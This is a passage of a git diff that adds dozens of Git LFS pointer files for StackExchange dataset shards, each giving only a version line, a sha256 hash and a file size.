sha256:fbc6dc3c76d334f3cd166000ab7ef34dd268658bcad2d17bcd361f406bf33f87 +size 32759629 diff --git a/data/stackexchange/1-1/1146_2289.jsonl b/data/stackexchange/1-1/1146_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2d6213e37cbaf561cdbd6ae78fbefbb6cfb55631 --- /dev/null +++ b/data/stackexchange/1-1/1146_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9fae5326a93d8476ee407334a3d5ce8f7965a04d7c850d1bac2d1dbebae08a43 +size 33442874 diff --git a/data/stackexchange/1-1/1147_2289.jsonl b/data/stackexchange/1-1/1147_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5c47f39edd72b770a8b32e41a85fdfb6583746c2 --- /dev/null +++ b/data/stackexchange/1-1/1147_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d03f0f109c1dcd66254dfd794adcabdcb834398f5cba86ceae9b0704c62f7273 +size 33127689 diff --git a/data/stackexchange/1-1/1148_2289.jsonl b/data/stackexchange/1-1/1148_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c4629781592d9b5d9049e470efefff559cbdae7a --- /dev/null +++ b/data/stackexchange/1-1/1148_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b75a70378641c49f0eef1ab293db0d6cdcc3264ab701d7ea7b1019ea588142a9 +size 32701549 diff --git a/data/stackexchange/1-1/1149_2289.jsonl b/data/stackexchange/1-1/1149_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae35d4171a748c225fbd6be3e06dadba519226c6 --- /dev/null +++ b/data/stackexchange/1-1/1149_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7974ad026655fb5f2b6aacac47887292b70b454810e38628dffce01e1274fdfd +size 32577674 diff --git a/data/stackexchange/1-1/114_2289.jsonl b/data/stackexchange/1-1/114_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..adc481bde30e771c8c9e77b605ac27329059a2e1 --- /dev/null +++ b/data/stackexchange/1-1/114_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7a3fd3c806a65fdb414102d35665522955699734bf780dd5094fb9ae57d7ca89 +size 33388424 diff --git a/data/stackexchange/1-1/1150_2289.jsonl b/data/stackexchange/1-1/1150_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f3afe8f26eb7f6f444cbd64377dcde6675dd5dae --- /dev/null +++ b/data/stackexchange/1-1/1150_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:732d2094f040046e2cd610362e8bf6a7690d815814d7f072d371a802f315112b +size 33481105 diff --git a/data/stackexchange/1-1/1151_2289.jsonl b/data/stackexchange/1-1/1151_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1fd9031af5619ea14a1cf4c0be5b20bc91dac67f --- /dev/null +++ b/data/stackexchange/1-1/1151_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b98a2a8db9957440eadd06407b093e7a89f59645b5d2cbf0bfe243c94039d5c5 +size 32815899 diff --git a/data/stackexchange/1-1/1152_2289.jsonl b/data/stackexchange/1-1/1152_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..afad2d4a5afa635f5c3e3be3b892026262759edb --- /dev/null +++ b/data/stackexchange/1-1/1152_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f5340ea2fa6868d5c2107c936a23189128330fd6d838ba8c5b864d5534430bed +size 33120041 diff --git a/data/stackexchange/1-1/1153_2289.jsonl b/data/stackexchange/1-1/1153_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..537d16db64659a155ba6df80860c6caeb6d7f5c5 --- /dev/null +++ b/data/stackexchange/1-1/1153_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:86423b6002d60df0cf9e11c9d6543184aa568bb2c8783adca1997d76db5e6033 +size 33620191 diff --git a/data/stackexchange/1-1/1154_2289.jsonl b/data/stackexchange/1-1/1154_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..93c5ab3c2289510ad921bc24e14b5213a6668b55 --- /dev/null +++ b/data/stackexchange/1-1/1154_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:94a58215e800ce15a32822714b4337d3c86182f14799e83e08aaebfecb41235f +size 32736353 diff --git a/data/stackexchange/1-1/1155_2289.jsonl b/data/stackexchange/1-1/1155_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2ac08c7f160f55925eeebebe1c2dd5994fa7db1d --- /dev/null +++ b/data/stackexchange/1-1/1155_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9366c0dd23142b22dab0158a36269c1b1496fc1b5b6cbe431d099a4529eb66f4 +size 33231094 diff --git a/data/stackexchange/1-1/1156_2289.jsonl b/data/stackexchange/1-1/1156_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3db8dba16135a0be675c3c43291c3a28e0ea019e --- /dev/null +++ b/data/stackexchange/1-1/1156_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:43c0f6d99cabcca20d14f14711b13016f5fd169ae2e15fabe22bac1968084efe +size 32785877 diff --git a/data/stackexchange/1-1/1157_2289.jsonl b/data/stackexchange/1-1/1157_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..413ac0691c4c29f19015e4cdfd6418704417fc6e --- /dev/null +++ b/data/stackexchange/1-1/1157_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7dbd82ad89fd0ff28f218a3d68f36a7b40d28da78194b2ff5659b5456beeb5bc +size 32545915 diff --git a/data/stackexchange/1-1/1158_2289.jsonl b/data/stackexchange/1-1/1158_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7054a41bbfc360be85dae14827e86a8e1981f51c --- /dev/null +++ b/data/stackexchange/1-1/1158_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:33ae1f63b91360f9b185c92330afad7046b1948916320f58b657924e1f90a815 +size 32712519 diff --git a/data/stackexchange/1-1/1159_2289.jsonl b/data/stackexchange/1-1/1159_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..db8ece8014528f91474e380b77f1ce4847c1f9c9 --- /dev/null +++ b/data/stackexchange/1-1/1159_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cb15e6e193da3fa5f76cec8769a511fee71aacda01deed285f49160d85e55b82 +size 32979367 diff --git a/data/stackexchange/1-1/115_2289.jsonl b/data/stackexchange/1-1/115_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a7dc264eea0744ac21f7bb0286256c74fee40638 --- /dev/null +++ b/data/stackexchange/1-1/115_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:954852be2c16165f19a996bd0767de3792024f2ab1069c15f83e31dc3dc46135 +size 33573020 diff --git a/data/stackexchange/1-1/1160_2289.jsonl b/data/stackexchange/1-1/1160_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0ac469d2844e19c3218eac42bc8a786404a25dd3 --- /dev/null +++ b/data/stackexchange/1-1/1160_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fbf2ce74fef0cb87210e1e0794177e1fc473d23f889fabb17fbbb985e72fba1b +size 32858573 diff --git a/data/stackexchange/1-1/1161_2289.jsonl b/data/stackexchange/1-1/1161_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f02cc1e826a01e15c0ec430feea68c2839e779ae --- /dev/null +++ b/data/stackexchange/1-1/1161_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe49be8ab0ef49c3ae3e44d7c3a34031ac8804aa2c0b1470b387991dd9d3ae58 +size 32732650 diff --git a/data/stackexchange/1-1/1162_2289.jsonl b/data/stackexchange/1-1/1162_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4cb238bb8fd6b1895b0634b8d96d0e5bb02cf95a --- /dev/null +++ b/data/stackexchange/1-1/1162_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:63cac139d62e4ad672af878cf713e1d96ebb625df07fbbb9231732e43d23481b +size 33175252 diff --git a/data/stackexchange/1-1/1163_2289.jsonl b/data/stackexchange/1-1/1163_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7187231ecfc60233d0c2a5681612211ea85fb241 --- /dev/null +++ b/data/stackexchange/1-1/1163_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:465709ba76e12fe4396475a22eee02747f66022a2dd646f2a2316f1e214e5fad +size 32740471 diff --git a/data/stackexchange/1-1/1164_2289.jsonl b/data/stackexchange/1-1/1164_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dad07482f4457dd70b6c3c5bf6e7f0491d16ade2 --- /dev/null +++ b/data/stackexchange/1-1/1164_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d0b608bb7e65106d3ff5428135e5a5570e355014b75a57138c0a0eda76ad9882 +size 33203482 diff --git a/data/stackexchange/1-1/1165_2289.jsonl b/data/stackexchange/1-1/1165_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..106d34d2fa1a3d3ca4a0ab7c55d1433724bcd223 --- /dev/null +++ b/data/stackexchange/1-1/1165_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d338eaaf22bc5ff179337487ccd142d67b7e8ce1b6e577e67f94a3ae970029d2 +size 32777392 diff --git a/data/stackexchange/1-1/1166_2289.jsonl b/data/stackexchange/1-1/1166_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..221d96aed3f5a4e2c3a7f3dc97194b96d14103b5 --- /dev/null +++ b/data/stackexchange/1-1/1166_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9af26125a09d2d17adcb69c2e08e36cc25084dc7e60e52301836d7a5124ca09 +size 33178723 diff --git a/data/stackexchange/1-1/1167_2289.jsonl b/data/stackexchange/1-1/1167_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..17b39f8a01585a265c7d961e8aac98ec837d9ced --- /dev/null +++ b/data/stackexchange/1-1/1167_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ceda3d4955b6e65cd0502c278efc952ae3ef367c319ea219a917fb148cf28567 +size 32573604 diff --git a/data/stackexchange/1-1/1168_2289.jsonl b/data/stackexchange/1-1/1168_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0aa20060b2b9ca2a8a43a21b196547ca55d5e9c2 --- /dev/null +++ b/data/stackexchange/1-1/1168_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b23c075f4f3b0f9f839bd2994981e79a5eab652ffcd24554085550dcac5bc22c +size 33404007 diff --git a/data/stackexchange/1-1/1169_2289.jsonl b/data/stackexchange/1-1/1169_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..201f53ebccf559868f81854bbc4aa3d2b6f9d034 --- /dev/null +++ b/data/stackexchange/1-1/1169_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:92b84f04ebda4578a32b6d251665759c38bfe44768bb02ec91ddc8bb97ccaf8e +size 33067397 diff --git a/data/stackexchange/1-1/116_2289.jsonl b/data/stackexchange/1-1/116_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9f31a5bafebb36f265ddc95f3b620fd1c8800f99 --- /dev/null +++ b/data/stackexchange/1-1/116_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d02a2dd9905b878bd3e6ced20beade213a09b432e5d8b22e265b02b0d8f491f3 +size 33742637 diff --git a/data/stackexchange/1-1/1170_2289.jsonl b/data/stackexchange/1-1/1170_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6456cd6e84ab05aa153872f3639e0faa38555730 --- /dev/null +++ b/data/stackexchange/1-1/1170_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:38d0701ec3475b62fc0c392b80d0fb8781862429b5d01b8153d68b8a275d35ed +size 33017952 diff --git a/data/stackexchange/1-1/1171_2289.jsonl b/data/stackexchange/1-1/1171_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cf8f49881bbdc047917980de01acf054d788cc61 --- /dev/null +++ b/data/stackexchange/1-1/1171_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2c02597386f02c6c2e18fde0ffee1c3390c9b51c223735a62bfc62d0233e41e1 +size 32781774 diff --git a/data/stackexchange/1-1/1172_2289.jsonl b/data/stackexchange/1-1/1172_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..67411b4b285077f0d52c35a1baaeb901e736203c --- /dev/null +++ b/data/stackexchange/1-1/1172_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f0a89c8e9d94b2ecd9e7c7ff39ea59c84f1513e44bdf94a2f52d3eb66548722e +size 32997581 diff --git a/data/stackexchange/1-1/1173_2289.jsonl b/data/stackexchange/1-1/1173_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..56e7f59473066083eaf09a546c276fe75917d364 --- /dev/null +++ b/data/stackexchange/1-1/1173_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0233d364d35a2c03bda2b9b2589f1011f678a0ed8263c3e635f8316f0edab8f0 +size 32823318 diff --git a/data/stackexchange/1-1/1174_2289.jsonl b/data/stackexchange/1-1/1174_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b45189636014d700f8fa5bab5c8e09b92a4b8415 --- /dev/null +++ b/data/stackexchange/1-1/1174_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:29ff3d303163df9bddf1af55876fe9e485560cc3ccca3ffff6c63de6482ce337 +size 32987740 diff --git a/data/stackexchange/1-1/1175_2289.jsonl b/data/stackexchange/1-1/1175_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cfd3582c8910c204a44b2020c5c36cd7e4f7d4e5 --- /dev/null +++ b/data/stackexchange/1-1/1175_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dcf99d16eec362e3a48c9aa5bfa11bd9a63a5fa2c8d068a92114409779cd5839 +size 33280315 diff --git a/data/stackexchange/1-1/1176_2289.jsonl b/data/stackexchange/1-1/1176_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6075320146231b31e18206fd4de998c8447aefaa --- /dev/null +++ b/data/stackexchange/1-1/1176_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b6a7293a0fd0f9f67b729deca98008e7c100498ab3eba8110b89bff50cea0cc2 +size 32795733 diff --git a/data/stackexchange/1-1/1177_2289.jsonl b/data/stackexchange/1-1/1177_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aa846d1d12be9fbc63234b46d5468d2bc6dacd50 --- /dev/null +++ b/data/stackexchange/1-1/1177_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e771c743f05d628246b7fa314cf2f72660eb440cd3eb58779259d8f6eeeafb56 +size 33024889 diff --git a/data/stackexchange/1-1/1178_2289.jsonl b/data/stackexchange/1-1/1178_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f2a6a9b84828e2d9bd62ce5c1c1753cb54b82c74 --- /dev/null +++ b/data/stackexchange/1-1/1178_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c6a69ae81483b55e73ab921027ee5afba595000eac188becc1b2a027debcc4c0 +size 33175397 diff --git a/data/stackexchange/1-1/1179_2289.jsonl b/data/stackexchange/1-1/1179_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9d98d04c35532865ac69de3aa6ec6aa5a4923f3c --- /dev/null +++ b/data/stackexchange/1-1/1179_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7cbced605a30a180a2f72b09e9f3d939ffa026328eee66464310d58b1059a7db +size 32854217 diff --git a/data/stackexchange/1-1/117_2289.jsonl b/data/stackexchange/1-1/117_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c91b43291782e7d78212b49e4200a62a3760fe8e --- /dev/null +++ b/data/stackexchange/1-1/117_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f58cfb1f9747ed8385001217e631d2d628113726e15d46f773882dbea294c66e +size 33819330 diff --git a/data/stackexchange/1-1/1180_2289.jsonl b/data/stackexchange/1-1/1180_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..61242a9e45674d9f7261fa1d77c42127732b26fc --- /dev/null +++ b/data/stackexchange/1-1/1180_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:364758e350d3a3d3eeb7334fa91ae2b6ce99e27719ec8689b04ebc83517ea084 +size 33129014 diff --git a/data/stackexchange/1-1/1181_2289.jsonl b/data/stackexchange/1-1/1181_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..31843a7c356148745c3a4982082913a07774737f --- /dev/null +++ b/data/stackexchange/1-1/1181_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4315964527ed641cedb993ea237254261e4084e9894011cfc94ce22e85f4e661 +size 32731863 diff --git a/data/stackexchange/1-1/1182_2289.jsonl b/data/stackexchange/1-1/1182_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3599c2f11c3130c0352f16cff98f7db1a23c50ba --- /dev/null +++ b/data/stackexchange/1-1/1182_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ca95aef2c0c0e77d6e8b48152fa6027a4a3b8105da479a08d598efda065ed898 +size 32779141 diff --git a/data/stackexchange/1-1/1183_2289.jsonl b/data/stackexchange/1-1/1183_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f740aaa5eb5cd09d813f211614cfa02a451478c0 --- /dev/null +++ b/data/stackexchange/1-1/1183_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:36db6fb28fc006142307acc03acdbcd3af079958c16b9b3bf0aa52ec72877244 +size 33293619 diff --git a/data/stackexchange/1-1/1184_2289.jsonl b/data/stackexchange/1-1/1184_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0ac11120e4f8629224d5b2821b17574ed1c11f3d --- /dev/null +++ b/data/stackexchange/1-1/1184_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:342a5f92ad15e85cf67e782c99d72e3d83854595a19d0ea25fe25be6c4303994 +size 33215724 diff --git a/data/stackexchange/1-1/1185_2289.jsonl b/data/stackexchange/1-1/1185_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b6b97af7b5510efcdb073e70adb8374129a3d69e --- /dev/null +++ b/data/stackexchange/1-1/1185_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:307690191e6915f09a81fc35d079147c69cabceaab5c790cac3b348e2daa87d4 +size 33118226 diff --git a/data/stackexchange/1-1/1186_2289.jsonl b/data/stackexchange/1-1/1186_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ce36379bf603c8bd82557cd244c3bdd593043413 --- /dev/null +++ b/data/stackexchange/1-1/1186_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6161c58713086f24238b9d15ef207b183b8acb9950efe219031228a853163c4d +size 33111221 diff --git a/data/stackexchange/1-1/1187_2289.jsonl b/data/stackexchange/1-1/1187_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1da1a6995e1682c42b81e846dd24cff4959557ca --- /dev/null +++ b/data/stackexchange/1-1/1187_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6ae0055d5e24f12520cb806c8cc5e34e8d8b62d1f241353f013d81c581be66fc +size 32994344 diff --git a/data/stackexchange/1-1/1188_2289.jsonl b/data/stackexchange/1-1/1188_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aded0125e40f8bfd250dc737658e2207d847fa2b --- /dev/null +++ b/data/stackexchange/1-1/1188_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bc421d1af5c8687ba779d978395f7eeeaa85c0b2119bbe83607217d682a6beec +size 32619136 diff --git a/data/stackexchange/1-1/1189_2289.jsonl b/data/stackexchange/1-1/1189_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0c090ef4e91e3d86c38960f4bcc3a7d32acbc73b --- /dev/null +++ b/data/stackexchange/1-1/1189_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:76f5548d0d14818375bb2a08c63809d02d5cc78753c7065be926347f85eb6d22 +size 37530801 diff --git a/data/stackexchange/1-1/118_2289.jsonl b/data/stackexchange/1-1/118_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fb593dc32ad655ce2db1246421f1f1c64b4e36f7 --- /dev/null +++ b/data/stackexchange/1-1/118_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:62bfcbcccc0ce8f5d8befaf3477046a2579a037a0036b8a7a643b5e945998810 +size 33515843 diff --git a/data/stackexchange/1-1/1190_2289.jsonl b/data/stackexchange/1-1/1190_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..59fafdd3a617de78df34532368dff2036f68d74d --- /dev/null +++ b/data/stackexchange/1-1/1190_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f6d631dca23d2fc74956c955a0ba5dc280c28762b0952c5687f02f86b478646e +size 38006504 diff --git a/data/stackexchange/1-1/1191_2289.jsonl b/data/stackexchange/1-1/1191_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d9b4c52d267d386a463bf84bd7f0d969f634d620 --- /dev/null +++ b/data/stackexchange/1-1/1191_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d84795fee9bf6685d2120efaa6057c7b1bf4e1db4d2686e8d24135716ef6f93f +size 37397876 diff --git a/data/stackexchange/1-1/1192_2289.jsonl b/data/stackexchange/1-1/1192_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fcc91ead49546cb1e186fa5d2e4f662a04beccb9 --- /dev/null +++ b/data/stackexchange/1-1/1192_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7e690d55d6e0bcdfcb8f65b95dc8b76ce8f8fb6f6188f63f94084ae4e6df32f +size 37573976 diff --git a/data/stackexchange/1-1/1193_2289.jsonl b/data/stackexchange/1-1/1193_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..29dc57ffaf01a5afca60e0413fe6266fc727ee4f --- /dev/null +++ b/data/stackexchange/1-1/1193_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1beab4a6e5f79b9e101862da1af9097d1b46b3ac9fe4141a0be22a76972fbbb1 +size 38180703 diff --git a/data/stackexchange/1-1/1194_2289.jsonl b/data/stackexchange/1-1/1194_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8dbe45bb3644379d8e4dab05c5e009f2bd40aba4 --- /dev/null +++ b/data/stackexchange/1-1/1194_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3ff2bebd34210a7b699523188ab14d0b209deb05e11943f02bdc2a2250ee30fb +size 37581373 diff --git a/data/stackexchange/1-1/1195_2289.jsonl b/data/stackexchange/1-1/1195_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3e56b0bcd1743e55a77664335c562ae128bffe26 --- /dev/null +++ b/data/stackexchange/1-1/1195_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a72f13761f91338b3e0dad25c2a32b28fab00ec79cc590ee184c008de44aac3a +size 38082788 diff --git a/data/stackexchange/1-1/1196_2289.jsonl b/data/stackexchange/1-1/1196_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..78fb5df2a2da8a23a6526229d9f7b45ebe696f7b --- /dev/null +++ b/data/stackexchange/1-1/1196_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9aef2a77789fd7adb13b6bb2bba5ab4244c446d885021f280adc9c5ece6c325d +size 38143460 diff --git a/data/stackexchange/1-1/1197_2289.jsonl b/data/stackexchange/1-1/1197_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..30877a2149fd782dabb652effa1f35168e6a989f --- /dev/null +++ b/data/stackexchange/1-1/1197_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d03f4fbbb9a30807c6babe55f500b6bd55e1a97c486fcb56f30162e2147e2ef +size 38308285 diff --git a/data/stackexchange/1-1/1198_2289.jsonl b/data/stackexchange/1-1/1198_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1cea5215ec976d07ede953465efade8589d10ace --- /dev/null +++ b/data/stackexchange/1-1/1198_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0557552412dae62574be5377a6cd22082dde70b8f1c1d16e30151d7a1adc19f9 +size 37568028 diff --git a/data/stackexchange/1-1/1199_2289.jsonl b/data/stackexchange/1-1/1199_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9c1cc9b33994f4ea78cbf03711e43723205f307d --- /dev/null +++ b/data/stackexchange/1-1/1199_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7d229620b04dd1f56b0c7528c6ae1b7b8ed264a7baf94fdbdba718355c6d117c +size 37603108 diff --git a/data/stackexchange/1-1/119_2289.jsonl b/data/stackexchange/1-1/119_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a0c324352178a0472748cd12009611fa92d33790 --- /dev/null +++ b/data/stackexchange/1-1/119_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2b762ae7a4d7ef73cbc664e2e89a86e2cc220558c373c2514b30d5fe4f072ccd +size 33522920 diff --git a/data/stackexchange/1-1/11_2289.jsonl b/data/stackexchange/1-1/11_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8c7af17775c3f5b785deeaeadebaf8719f088f38 --- /dev/null +++ b/data/stackexchange/1-1/11_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5c8f6c2785b4046b66b226219bfb5d9df6ee2e8de902e16619b6b72adcb6f4f5 +size 35909146 diff --git a/data/stackexchange/1-1/1200_2289.jsonl b/data/stackexchange/1-1/1200_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f47e44b7c4ddf5f65c4591df70c1ab4ee2437c2c --- /dev/null +++ b/data/stackexchange/1-1/1200_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e25eb7548096816a4e747849f3a7a37366281c5ba5e88a6d7651de5ee228ce79 +size 37512180 diff --git a/data/stackexchange/1-1/1201_2289.jsonl b/data/stackexchange/1-1/1201_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bb4a3d4925ddf30d43c788f5b5846ef30c564117 --- /dev/null +++ b/data/stackexchange/1-1/1201_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ea44ba154d60d49c5fc68280a1877b440c415935f72e403fde555d35f157e8ed +size 37942766 diff --git a/data/stackexchange/1-1/1202_2289.jsonl b/data/stackexchange/1-1/1202_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e254b7199aa1c3f83d978463026905a7b62507d7 --- /dev/null +++ b/data/stackexchange/1-1/1202_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a690a8db3d6cabb9a308108e0fd6445d6d70c129c52dd31c7e152a831d1f51db +size 37463806 diff --git a/data/stackexchange/1-1/1203_2289.jsonl b/data/stackexchange/1-1/1203_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..12a127b5543c667bc58229bb324a0d3f84ca5e44 --- /dev/null +++ b/data/stackexchange/1-1/1203_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2af1e8eab4f3d0c98d03e070975f908d71c9463d533629c7286e10dfeca87fd0 +size 37639020 diff --git 